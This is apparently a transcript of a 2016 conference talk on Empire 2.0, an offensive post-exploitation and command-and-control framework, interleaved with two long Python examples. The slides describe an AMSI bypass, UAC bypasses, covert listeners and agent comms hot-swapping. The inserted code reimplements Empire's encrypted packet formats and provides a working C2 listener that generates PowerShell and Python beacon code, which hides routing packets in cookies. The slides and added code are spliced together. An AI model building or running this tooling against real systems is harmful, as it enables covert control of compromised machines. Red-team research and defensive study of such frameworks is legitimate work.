This presentation was given at DerbyCon 6 on 9/23/2016. It covers the fusion of the PowerShell Empire and Python EmPyre projects, as well as new Empire 2.0 transports.
2. First Things First
✣ Empire would not be possible without the
help and phenomenal work from:
PowerSploit by @mattifestation, @obscuresec
and @JosephBialek
Posh-SecMod by @Carlos_Perez
UnmanagedPowerShell by @tifkin_
Mimikatz by @gentilkiwi and Vincent Le Toux
✣ Everyone who contributed modules, bugs,
fixes, and time! You all rock!
3. Co-founder of Empire/EmPyre | PowerTools |
Veil-Framework
PowerSploit/BloodHound developer
Microsoft PowerShell MVP
@harmj0y
4. Red teamer and Empire developer
UAC bypasser extraordinaire
Offensive PowerShell advocate
@enigma0x3
5. tl;dr
✣ Empire overview
✣ Empire 2.0
Motivations
New features
EmPyre integration
‘Modular’ listeners
✣ Demos
7. Teh Empire
✣ A full-featured PowerShell post-exploitation agent
Released at BSides LV ‘15
✣ Core agent built in PowerShell
Module structure implements various post-exploitation actions
✣ Controller built in Python
Backend sqlite database
UI focus
8. ✣ Started as a thought exercise!
✣ Wanted to:
bring together all the existing offensive PowerShell tech
build a flexible platform that’s easily customizable in the field
train defenders on how to stop and respond to PowerShell “attacks”
y u Build PowerShell Botnet :(
18. New Features Since Release
✣ From 90 modules to 180!
Inveigh/Tater!
regsvr32!
MS16-032!
More TrollSploit!
KeeThief!
Lots of UAC bypasses!
Tons more!
✣ A RESTful API interface
✣ Autoruns, lost limits, and more.
19. Python EmPyre
✣ A Python Empire variant built for a
customer’s heavy OS X environment
Python 2.6/2.7 compatible agent
Works on Linux too!
✣ Controller/architecture HEAVILY
adopted from Empire
✣ Released publicly at HackMiami
Presented at BSides LV ‘16
20. Empire Drawbacks
✣ We’ve never built a RAT before
Mistakes were made ¯\_(ツ)_/¯
✣ Only comms methods were HTTP[S]
Modules were expandable, transports weren’t
✣ Separate projects for Empire/EmPyre
Name/project confusion
Separate codebases ==
22. Motivations
✣ Empire/EmPyre Integration
Wanted one single controller for our Python Linux/OS X agents and PowerShell agents.
✣ Modularize C2
Expandable listeners that you can drag/drop into the framework for additional transports.
✣ Code Rot
Fix our past mistakes and build a foundation for the future viability of the project.
23. Laying the Foundation
✣ For future transports, agents may need to be able to figure out where to route packets for other agents
✣ All Empire comms are now wrapped in ‘routing’ packets encrypted w/ the staging key
✣ All individual agent comms still use the negotiated agent key
24. New Routing/Metadata Packet:
+---------+-------------------+--------------------------+
| RC4 IV | RC4s(RoutingData) | AESc(client packet data) |
+---------+-------------------+--------------------------+
| 4 | 16 | RC4 length |
+---------+-------------------+--------------------------+
RC4s(RoutingData):
+-----------+------+------+-------+--------+
| SessionID | Lang | Meta | Extra | Length |
+-----------+------+------+-------+--------+
| 8 | 1 | 1 | 2 | 4 |
+-----------+------+------+-------+--------+
RC4s = RC4 w/ the shared staging key
HMACs = SHA1 HMAC w/ the shared staging key
AESc = AES w/ the client's session key
HMACc = first 10 bytes of a SHA256 HMAC using the client's session key
25. AESc(client data)
+--------+-----------------+-------+
| AES IV | Enc Packet Data | HMACc |
+--------+-----------------+-------+
| 16 | % 16 bytes | 10 |
+--------+-----------------+-------+
Client data decrypted:
+------+--------+--------------------+----------+---------+-----------+
| Type | Length | total # of packets | packet # | task ID | task data |
+------+--------+--------------------+----------+---------+-----------+
|  2   |   4    |         2          |    2     |    2    | <Length>  |
+------+--------+--------------------+----------+---------+-----------+
RC4s = RC4 w/ the shared staging key
HMACs = SHA1 HMAC w/ the shared staging key
AESc = AES w/ the client's session key
HMACc = first 10 bytes of a SHA256 HMAC using the client's session key
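The two packet layers on slides 24 and 25, as an added worked example (this is not Empire's own packets.py, only a stdlib reimplementation of the layouts drawn above). Field widths follow the diagrams; little-endian packing, keying RC4 with the 4-byte IV prepended to the staging key, the language ID numbering, and the sample keys/session ID are assumptions for this illustration. AES-CBC itself needs a crypto library and is left to the caller, so the "AESc" blob is carried opaquely; what the example does show is the RC4 routing header round trip, the truncated HMAC-SHA256 check on the client blob, and the decrypted task packet layout:

```python
import hashlib
import hmac
import os
import struct

# Added example, not Empire code. Layouts follow the slide diagrams; endianness,
# the RC4 keying (IV || staging key), LANGUAGE_IDS and all keys are assumptions.
LANGUAGE_IDS = {"POWERSHELL": 1, "PYTHON": 2}   # assumed numbering
ROUTING_FMT = "<8sBBHI"   # SessionID(8) Lang(1) Meta(1) Extra(2) Length(4) = 16 bytes
TASK_FMT = "<HIHHH"       # Type(2) Length(4) total#(2) packet#(2) taskID(2) = 12 bytes
HMAC_LEN = 10             # HMACc = first 10 bytes of HMAC-SHA256


def rc4(key, data):
    """Textbook RC4 (KSA + PRGA); encrypt and decrypt are the same operation."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def build_routing_packet(staging_key, session_id, lang, meta, extra, enc_data):
    """RC4 IV | RC4s(RoutingData) | enc_data   (enc_data = the opaque AESc blob)."""
    if len(session_id) != 8:
        raise ValueError("SessionID must be 8 bytes")
    routing = struct.pack(ROUTING_FMT, session_id, lang, meta, extra, len(enc_data))
    iv = os.urandom(4)
    return iv + rc4(iv + staging_key, routing) + enc_data


def parse_routing_packet(staging_key, packet):
    """Server side: peel the header, return (fields, enc_data, remainder).
    The remainder allows several routing packets in one request. Note the RC4
    layer carries no MAC: a flipped header bit is only caught later, by the
    SessionID lookup or by HMACc on the inner packet."""
    if len(packet) < 20:
        raise ValueError("truncated routing packet")
    iv, enc_routing, rest = packet[:4], packet[4:20], packet[20:]
    session_id, lang, meta, extra, length = struct.unpack(
        ROUTING_FMT, rc4(iv + staging_key, enc_routing))
    if len(rest) < length:
        raise ValueError("routing Length exceeds data present")
    fields = {"session_id": session_id, "lang": lang, "meta": meta,
              "extra": extra, "length": length}
    return fields, rest[:length], rest[length:]


def hmac_c(session_key, data):
    return hmac.new(session_key, data, hashlib.sha256).digest()[:HMAC_LEN]


def seal_client_blob(session_key, aes_iv, ciphertext):
    """AES IV | ciphertext | HMACc  (encrypt-then-MAC; AES-CBC done by the caller)."""
    body = aes_iv + ciphertext
    return body + hmac_c(session_key, body)


def open_client_blob(session_key, blob):
    """Check HMACc in constant time before touching the ciphertext; return (iv, ct)."""
    if len(blob) < 16 + HMAC_LEN or (len(blob) - HMAC_LEN) % 16:
        raise ValueError("malformed client packet")
    body, tag = blob[:-HMAC_LEN], blob[-HMAC_LEN:]
    if not hmac.compare_digest(hmac_c(session_key, body), tag):
        raise ValueError("bad HMACc, dropping packet")
    return body[:16], body[16:]


def build_task_packet(ptype, total, num, task_id, data):
    return struct.pack(TASK_FMT, ptype, len(data), total, num, task_id) + data


def parse_task_packet(plain):
    """Decode one decrypted task packet; returns (fields, data, remainder)."""
    if len(plain) < 12:
        raise ValueError("truncated task packet")
    ptype, length, total, num, task_id = struct.unpack(TASK_FMT, plain[:12])
    if len(plain) < 12 + length:
        raise ValueError("task packet Length exceeds data present")
    fields = {"type": ptype, "total": total, "num": num, "task_id": task_id}
    return fields, plain[12:12 + length], plain[12 + length:]


def demo():
    """One agent -> server hop with constructed keys (not real ones)."""
    staging_key, session_key = b"S" * 32, b"C" * 32
    fake_iv, fake_ct = b"\x00" * 16, b"\xaa" * 32   # stands in for AES-CBC output
    blob = seal_client_blob(session_key, fake_iv, fake_ct)
    pkt = build_routing_packet(staging_key, b"A1B2C3D4",
                               LANGUAGE_IDS["POWERSHELL"], 0, 0, blob)
    fields, enc, rest = parse_routing_packet(staging_key, pkt)
    iv, ct = open_client_blob(session_key, enc)
    return fields, iv, ct, rest
```

The point worth keeping in mind from the diagrams: only the inner AESc blob is authenticated (HMACc, checked before anything else happens), while the outer RC4 header is confidentiality-only, so the server has to treat the routing fields as untrusted hints until the SessionID resolves to a known agent and the inner MAC verifies.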
26. Newz
✣ The HTTP listener has been redone
with Flask
✣ Epoch-syncing removed
✣ PowerShell:
Staging now uses HMAC and nonces
RC4 implemented for first stage
PowerShell obfuscation
@mattifestation’s AMSI bypass added to
the PowerShell stager
27. Newz
✣ Orphaned agent renegotiation
If agent shares a server staging key, but
isn’t in the cache, it will restage
✣ external/* modules
For things that don’t rely on an agent
external/generate_agent will generate a
“fully-staged” agent
33. EmPyre Integration
✣ EmPyre and Empire are now one code
base!
https://github.com/AdaptiveThreat/Empire
The EmPyre repo will be deprecated
Python/PowerShell agents can
communicate on the same listener/port!
✣ We also now have a 5 person “full-time”
dev team:
@harmj0y, @enigma0x3, @424f424f,
@xorrior, @tifkin_
36. Interface Integration
✣ interact AGENT
Drops you into the language-appropriate agent menu with the same options you’re used to for either project.
✣ stagers/*
Now broken out into OS-applicable folders (Windows/OS X/Linux).
✣ usemodule [tab]
Executed from an agent, only tab-completes language-appropriate modules.
38. Listener Modularization
✣ Previously, listeners were hard-coded into the code base, so adding transports was extremely difficult
✣ Now listeners are encapsulated in
self-contained modules
Allows you to drag/drop modules into the
framework!
39. Listener Modules
✣ At least two functions are required for a
listener module:
generate_comms() - generates the
communication functions patched for the
given listener
start() - starts the server component of the
listener
✣ Agents are responsible for language
support
40. Listener Modules
✣ If you want staging supported:
generate_launcher() - generates
PowerShell/Python launcher code
generate_stager() - generates the
key-negotiation code
generate_agent() - generates the complete
patched agent code
41. listeners/http
✣ The original HTTP[S] listener
But now redone with flask!
“Routing packet” is base64’ed and stuffed
into a new cookie value
✣ Generates Python and PowerShell
launchers, staging, and agent code
✣ You can easily modify the cookie
used/transforms on the data itself to
change up indicators!
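A minimal listener module in the shape slides 39 to 41 describe, as an added example (this is not Empire's own listeners/http code): it provides the two required functions, generate_comms() and start(), skips the optional generate_launcher()/generate_stager()/generate_agent() staging hooks, and implements the "routing packet base64'd into a cookie" transport so that changing one option changes the wire indicator. The class and option names, the cookie name, the generated PowerShell/Python snippets, the stdlib HTTP server and the sample cookie values are all assumptions for this illustration:

```python
import base64
import http.server
import threading

# Added example, not Empire's listener code. Class/option names, the cookie
# transform and the generated agent snippets are assumptions for illustration.


class CookieHttpListener:
    def __init__(self, host="127.0.0.1", port=8080, cookie_name="session"):
        self.options = {"Host": host, "Port": port, "CookieName": cookie_name}
        self.received = []     # routing packets pulled out of incoming requests
        self.server = None

    def generate_comms(self, language):
        """Agent-side comms code with host/port/cookie patched in. Changing
        CookieName changes the indicator without touching the agent core."""
        host, port = self.options["Host"], self.options["Port"]
        cookie = self.options["CookieName"]
        url = "http://%s:%d/" % (host, port)
        if language.lower() == "powershell":
            return "\n".join([
                "$wc = New-Object Net.WebClient",
                '$wc.Headers.Add("Cookie", "%s=" + '
                "[Convert]::ToBase64String($RoutingPacket))" % cookie,
                '$data = $wc.DownloadData("%s")' % url,
            ])
        if language.lower() == "python":
            # Page says the Python agent targets 2.6/2.7, hence urllib2.
            return "\n".join([
                "import base64, urllib2",
                'req = urllib2.Request("%s")' % url,
                'req.add_header("Cookie", "%s=" + base64.b64encode(routing_packet))'
                % cookie,
                "data = urllib2.urlopen(req).read()",
            ])
        raise ValueError("unsupported agent language: %s" % language)

    def extract_routing_packet(self, cookie_header):
        """Undo the transform: find our cookie and base64-decode it, else None."""
        for part in cookie_header.split(";"):
            name, _, value = part.strip().partition("=")
            if name == self.options["CookieName"]:
                try:
                    return base64.b64decode(value, validate=True)
                except ValueError:     # binascii.Error is a ValueError
                    return None
        return None

    def start(self):
        """Server component: hands each routing packet to the framework
        (here: self.received) and answers everything else with a plain 404."""
        listener = self

        class Handler(http.server.BaseHTTPRequestHandler):
            def do_GET(self):
                pkt = listener.extract_routing_packet(self.headers.get("Cookie", ""))
                if pkt is None:
                    self.send_response(404)
                    self.end_headers()
                    return
                listener.received.append(pkt)
                self.send_response(200)
                self.end_headers()

            do_POST = do_GET

            def log_message(self, *args):   # keep the demo quiet
                pass

        self.server = http.server.HTTPServer(
            (self.options["Host"], self.options["Port"]), Handler)
        threading.Thread(target=self.server.serve_forever, daemon=True).start()
        return self.server
```

Because the transport-specific parts (cookie name, base64 transform, URL) live only in the module, a second module with a different transform or a different carrier header is a drop-in addition, which is the point of the modular listener design; the routing packet itself is decoded by the framework exactly as before.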
42. listeners/http_com
✣ Utilizes Internet Explorer COM
objects to communicate instead of
Net.WebClient
Proxy-aware/etc.!
✣ Slightly different communication
structure (data is base64’ed, etc.)
Example of modifying basic C2 indicators
44. listeners/http_hop
✣ Completely redone “hop” listener
Simpler (with new packet structure) and
should be more stable
✣ Uses a .php redirector to tunnel
comms through a third site
✣ We’re looking for more language-based redirectors!
.ASP/.JSP/etc.
45. listeners/meterpreter
✣ The only thing present is the
generate_launcher() method
This generates Invoke-ShellCode code
applicable for the given Meterpreter
listener specification
✣ Allows you to easily spawn
Meterpreter/Cobalt Strike sessions
from Empire!
46. Third Party Listeners
✣ The new structure allows you to communicate (and possibly stage) through well-known third party websites
✣ Let your imagination run with it…
* don’t break any terms of service, we’re not lawyers
48. Listener Hot-Swapping
✣ The management/switch_listener
module allows you to generate the
comms for a listener, and
dynamically update a running agent
with new comms!
✣ You can switch from HTTP ->
Dropbox -> IE_COM -> Dropbox,
even en masse!
49. Future Listeners
✣ In the next few months:
SMB - just need to work out some of the
routing components
DNS - @enigma0x3 is working as we speak
✣ Ideas?